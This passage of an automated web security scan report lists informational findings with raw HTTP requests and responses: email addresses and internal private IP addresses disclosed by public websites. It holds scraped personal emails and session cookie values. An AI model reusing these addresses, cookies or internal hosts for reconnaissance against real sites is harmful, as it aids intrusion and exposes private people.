...[SNIP]...

21.460. http://www.robtex.com/faq.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.robtex.com
Path:	/faq.html

Issue detail

The following email address was disclosed in the response:

info@robtex.com

Request

Response

HTTP/1.1 200 OK
X-Meta-Description: robtex swiss army knife internet tool
X-Meta-Keywords: rbls, as-numbers, whois, dns, lookup
Title: Frequently Asked Questions (FAQ)
X-Content-Length: 30262
Content-Type: text/html; charset=UTF-8
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
X-rt: u p20078 f4673 d0 b
Cache-Control: public, max-age=0
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 02:34:02 GMT
ETag: 63646b7a953806c54be033753debe7a3
Y-Content-Length: 30262 30262
Server: lighttpd/1.4.19
X-Cache: MISS from front0.x.robtex.com
X-Cache-Lookup: HIT from front0.x.robtex.com:80
Via: 1.1 front0.x.robtex.com:80 (squid/2.7.STABLE3)
Content-Length: 30262
Date: Thu, 03 Feb 2011 02:34:02 GMT
X-Varnish: 191004756
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:info@robtex.com?Subject=I%20have%20read%20the%20FAQ">info@robtex.com</a>
...[SNIP]...

21.461. http://www.scmagazineus.com/search/xss/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scmagazineus.com
Path:	/search/xss/

Issue detail

The following email address was disclosed in the response:

kathleen.merot@haymarketmedia.com

Request

GET /search/xss/ HTTP/1.1
Host: www.scmagazineus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.462. http://www.sitepoint.com/article/browser-specific-css-hacks previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sitepoint.com
Path:	/article/browser-specific-css-hacks

Issue detail

The following email address was disclosed in the response:

serveradmin@sitepoint.com

Request

GET /article/browser-specific-css-hacks HTTP/1.1
Host: www.sitepoint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 16:17:10 GMT
Server: Apache
Set-Cookie: mobify=0; path=/; domain=.sitepoint.com; expires=Thu, 02-Feb-2012 16:17:10 GMT
Location: http://articles.sitepoint.com/article/browser-specific-css-hacks
Content-Length: 386
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://articles.sitepoi
...[SNIP]...
<a href="mailto:serveradmin@sitepoint.com">
...[SNIP]...

21.463. http://www.threatexpert.com/contact.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/contact.aspx

Issue detail

The following email address was disclosed in the response:

info@threatexpert.com

Request

Response

21.464. http://www.trip.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.trip.com
Path:	/

Issue detail

The following email address was disclosed in the response:

advertising@away.com

Request

GET / HTTP/1.1
Host: www.trip.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.465. http://www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.virtualtourist.com
Path:	/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html

Issue detail

The following email address was disclosed in the response:

AccElan01@msn.com

Request

Response

HTTP/1.1 200 OK
Server: Jetty(6.1.14)
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 16:18:16 GMT
Content-Language: en
Connection: close
Set-Cookie: VTT=64.14.197.3.1296663496.485621; Path=/; Domain=.virtualtourist.com
Content-Length: 87089

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head
...[SNIP]...
g the Tea Party Ship (which is closed due to a fire). The restaurant is delicious but quite pricy. Tip: Use Priceline to name your price; I got our room for $150/night. Email me with any questions: AccElan01@msn.com<br>
...[SNIP]...

21.466. http://www.w3.org/TR/html4/strict.dtd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.w3.org
Path:	/TR/html4/strict.dtd

Issue detail

The following email addresses were disclosed in the response:

dsr@w3.org
ij@w3.org
lehors@w3.org

Request

GET /TR/html4/strict.dtd HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:36:28 GMT
Server: Apache/2
Content-Location: strict.dtd.raw
Vary: negotiate,accept-encoding,User-Agent
TCN: choice
Last-Modified: Fri, 24 Dec 1999 23:37:48 GMT
ETag: "8720-35c741aef8b00;475d1b7cb20c0"
Accept-Ranges: bytes
Content-Length: 34592
Cache-Control: max-age=7776000
Expires: Mon, 02 May 2011 14:36:28 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/plain

<!--
This is HTML 4.01 Strict DTD, which excludes the presentation
attributes and elements that W3C expects to phase out as
support for style sheets matures. Authors should use the Stric
...[SNIP]...
<dsr@w3.org>
...[SNIP]...
<lehors@w3.org>
...[SNIP]...
<ij@w3.org>
...[SNIP]...

21.467. http://www.wordpresstemplates.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wordpresstemplates.com
Path:	/

Issue detail

The following email address was disclosed in the response:

geoff@deconcept.com

Request

GET / HTTP/1.1
Host: www.wordpresstemplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.468. http://www.worldmastiffforum.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.worldmastiffforum.com
Path:	/

Issue detail

The following email address was disclosed in the response:

tmrosa@optonline.net

Request

GET / HTTP/1.1
Host: www.worldmastiffforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.469. http://www.xss.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xss.com
Path:	/

Issue detail

The following email address was disclosed in the response:

contact@xss.com

Request

GET / HTTP/1.1
Host: www.xss.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 04:07:11 GMT
Server: Apache
Last-Modified: Fri, 23 Jul 2010 07:08:16 GMT
ETag: "88318b73-961-4c493fe0"
Accept-Ranges: bytes
Content-Length: 2401
Connection: close
Content-Type: text/html

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
       <meta name="description" content="
...[SNIP]...
<a href="mailto:contact@xss.com">contact@xss.com</a>
...[SNIP]...

21.470. http://xss-proxy.sourceforge.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://xss-proxy.sourceforge.net
Path:	/

Issue detail

The following email address was disclosed in the response:

a_rager@yahoo.com

Request

GET / HTTP/1.1
Host: xss-proxy.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Thu, 03 Feb 2011 04:07:11 GMT
Content-Type: text/html
Connection: close
Last-Modified: Sat, 12 Feb 2005 16:15:28 GMT
ETag: "cee-3efecb92a2800"
Accept-Ranges: bytes
Content-Length: 3310
Cache-Control: max-age=172800
Expires: Sat, 05 Feb 2011 04:07:11 GMT

<head><title>XSS-Proxy: A tool for realtime XSS hijacking and control</title>
</head>
<body>
<html>
<h1> XSS-Proxy </H1>
<br>
XSS-Proxy is an advanced Cross-Site-Scripting (XSS) attack tool. The docum
...[SNIP]...
<a href="mailto:a_rager@yahoo.com">
...[SNIP]...

22. Private IP addresses disclosed previous next
There are 25 instances of this issue:

http://blog.threatexpert.com/
http://businessonmain.msn.com/videos/coolrunnings.aspx
https://login.facebook.com/ajax/intl/language_dialog.php
https://login.facebook.com/ajax/intl/language_dialog.php
http://pixel.facebook.com/ajax/register/logging.php
http://pixel.facebook.com/ajax/register/logging.php
http://vimeo.com/moogaloop.swf
http://vimeo.com/moogaloop.swf
http://vimeo.com/moogaloop.swf
http://www.facebook.com/ajax/intl/language_dialog.php
http://www.facebook.com/ajax/intl/language_dialog.php
http://www.facebook.com/ajax/intl/language_dialog.php
http://www.facebook.com/ajax/reg_birthday_help.php
http://www.facebook.com/platform
http://www.google.com/sdch/GeNLY2f-.dct
http://www.msnbc.msn.com/
http://www.msnbc.msn.com/id/3032072/ns/business
http://www.msnbc.msn.com/id/3032076/ns/health
http://www.msnbc.msn.com/id/3032118/ns/technology_and_science
http://www.msnbc.msn.com/id/3032507/ns/world_news
http://www.msnbc.msn.com/id/3032525/ns/us_news
http://www.msnbc.msn.com/id/3032553/ns/politics
http://www.pctools.com/registry-mechanic/
http://www.robtex.com/as/as15169.html
http://www.scmagazineus.com/search/xss/

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

22.1. http://blog.threatexpert.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.threatexpert.com
Path:	/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.5.164

Request

GET / HTTP/1.1
Host: blog.threatexpert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Wed, 02 Feb 2011 19:18:46 GMT
Date: Wed, 02 Feb 2011 19:18:46 GMT
Last-Modified: Sun, 16 Jan 2011 23:51:06 GMT
ETag: "43c6de0f-207e-40ef-9cd3-d5ab5e8339e0"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Age: 0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/g
...[SNIP]...
<br />The source code of the trojan contains a hard-coded host name 192.168.5.164 that is tried out every 5 seconds, but these values must have been used during testing only - they are replaced with the different ones during the runtime - we must establish which ones.<br />
...[SNIP]...

22.2. http://businessonmain.msn.com/videos/coolrunnings.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://businessonmain.msn.com
Path:	/videos/coolrunnings.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.0.0

Request

GET /videos/coolrunnings.aspx HTTP/1.1
Host: businessonmain.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.3. https://login.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.36.233.121

Request

GET /ajax/intl/language_dialog.php?uri=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1&source=TOP_LOCALES_DIALOG HTTP/1.1
Host: login.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=deleted; datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=deleted; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; wd=deleted; __utmc=deleted; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmb=deleted;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-FB-Server: 10.36.233.121
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 02 Feb 2011 16:32:09 GMT
Content-Length: 46469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

22.4. https://login.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.36.235.108

Request

Response

22.5. http://pixel.facebook.com/ajax/register/logging.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.facebook.com
Path:	/ajax/register/logging.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.144.169.103

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 67
Content-Type: image/png
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-FB-Server: 10.144.169.103
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-Cnection: close
Date: Sat, 05 Feb 2011 14:24:04 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

22.6. http://pixel.facebook.com/ajax/register/logging.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.facebook.com
Path:	/ajax/register/logging.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.36.132.106

Request

Response

22.7. http://vimeo.com/moogaloop.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vimeo.com
Path:	/moogaloop.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.90.128.76

Request

GET /moogaloop.swf HTTP/1.1
Host: vimeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:42:41 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Expires: Wed, 02 Feb 2011 03:42:41 GMT
X-Server: 10.90.128.76
Vary: Accept-Encoding
Content-Length: 244
Connection: close
Content-Type: application/x-shockwave-flash

FWS.....p...........?........
..embed_location.moogaloop.moogaloop_type.player.vimeo.com.player_server.a.vimeocdn.com.cdn_server.http://a.vimeocdn.com/p/flash/moogaloop/5.1.3/moogaloop.swf._root......
...[SNIP]...

22.8. http://vimeo.com/moogaloop.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vimeo.com
Path:	/moogaloop.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.90.128.65

Request

GET /moogaloop.swf?clip_id= HTTP/1.1
Host: vimeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:42:41 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Expires: Wed, 02 Feb 2011 03:42:41 GMT
X-Server: 10.90.128.65
Vary: Accept-Encoding
Content-Length: 244
Connection: close
Content-Type: application/x-shockwave-flash

FWS.....p...........?........
..embed_location.moogaloop.moogaloop_type.player.vimeo.com.player_server.a.vimeocdn.com.cdn_server.http://a.vimeocdn.com/p/flash/moogaloop/5.1.3/moogaloop.swf._root......
...[SNIP]...

22.9. http://vimeo.com/moogaloop.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vimeo.com
Path:	/moogaloop.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.90.6.237

Request

GET /moogaloop.swf?clip_id=6209628&server=vimeo.com&show_title=1&show_byline=1&show_portrait=1&color=&fullscreen=1&autoplay=0&loop=0 HTTP/1.1
Host: vimeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:42:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Expires: Wed, 02 Feb 2011 03:42:42 GMT
X-Server: 10.90.6.237
Vary: Accept-Encoding
Content-Length: 244
Connection: close
Content-Type: application/x-shockwave-flash

FWS.....p...........?........
..embed_location.moogaloop.moogaloop_type.player.vimeo.com.player_server.a.vimeocdn.com.cdn_server.http://a.vimeocdn.com/p/flash/moogaloop/5.1.3/moogaloop.swf._root......
...[SNIP]...

22.10. http://www.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.37.21.104

Request

Response

22.11. http://www.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.34.75

Request

Response

22.12. http://www.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.57.47

Request

GET /ajax/intl/language_dialog.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-FB-Server: 10.53.57.47
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 04:08:14 GMT
Content-Length: 43523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

22.13. http://www.facebook.com/ajax/reg_birthday_help.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/reg_birthday_help.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.53.29

Request

Response

22.14. http://www.facebook.com/platform previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/platform

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.22.87

Request

Response

22.15. http://www.google.com/sdch/GeNLY2f-.dct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/sdch/GeNLY2f-.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.31.196.197

Request

GET /sdch/GeNLY2f-.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; SSDATA-DOMAIN=ikjREw(0:; TZ=360; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb
If-Modified-Since: Sat, 29 Jan 2011 15:48:32 GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-sdch-dictionary
Last-Modified: Tue, 01 Feb 2011 09:48:40 GMT
Date: Tue, 01 Feb 2011 15:25:48 GMT
Expires: Tue, 01 Feb 2011 15:25:48 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 107132

Domain: .google.com
Path: /search

- Google Search</title><script>window.google={kEI:" QT0T WJ_5AKtpypmg8",kEXPI:"27344,27642,27744WJ_5AKtpypmg8",expi:"27344,27642,27744CMMWJ_5
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: 4AUACFJFdYwJ:search.aol.com/+aolMJE2Iq51jh0J:webmail.aol.com/+aol3-ZEIkE37Z4J:www.directv.com/+direct &hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'
...[SNIP]...
<a href="/search?hl=en&q=inauthor:" http://172.31.196.197:8888/search?q=cache: dictionary.reference.com/browse/ &hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','','1 2','','0CD ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:v_TYzMSa2vkJ:www.whitepages.com/+ &hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','','1 wQqwMoA ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:J: i en.wikipedia.org/wiki/DirecTV+direct www.directv.com/DTVAPP/epg/theGuide.jsp+direct www.directv.com/DTVAPP/content/ +direct
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &cd=6&hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','','6','','0C c ')">
...[SNIP]...
<a href="/search?hl=en&q=inauthor:"http://172.31.196.197:8888/search?q=cache: " onmousedown="return clk(this.href,'','','',' 7','','0C ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','','1','','0CC QIDAA')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: J:explore.live.com/windows-live- &hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','',' &tbo=1&sa=X&ei=4AT0TsWJ_5AKtpypmg
...[SNIP]...
<a href="/search?hl=en&q=related: s&tbo=1&sa=X&ei=4AT0Thttp://172.31.196.197:8888/search?q=cache:&cd=10&hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','','10','','0C opics.nytimes.com/top/news/business/companies/ WJ_5AKtpypm
...[SNIP]...

22.16. http://www.msnbc.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.7.224.218

Request

GET / HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.17. http://www.msnbc.msn.com/id/3032072/ns/business previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/3032072/ns/business

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.7.224.218

Request

GET /id/3032072/ns/business HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.18. http://www.msnbc.msn.com/id/3032076/ns/health previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/3032076/ns/health

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.7.224.218

Request

GET /id/3032076/ns/health HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.19. http://www.msnbc.msn.com/id/3032118/ns/technology_and_science previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/3032118/ns/technology_and_science

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.7.224.218

Request

GET /id/3032118/ns/technology_and_science HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.20. http://www.msnbc.msn.com/id/3032507/ns/world_news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/3032507/ns/world_news

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.7.224.218

Request

GET /id/3032507/ns/world_news HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.21. http://www.msnbc.msn.com/id/3032525/ns/us_news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/3032525/ns/us_news

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.7.224.218

Request

GET /id/3032525/ns/us_news HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.22. http://www.msnbc.msn.com/id/3032553/ns/politics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/3032553/ns/politics

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.7.224.218

Request

GET /id/3032553/ns/politics HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.23. http://www.pctools.com/registry-mechanic/ previous next

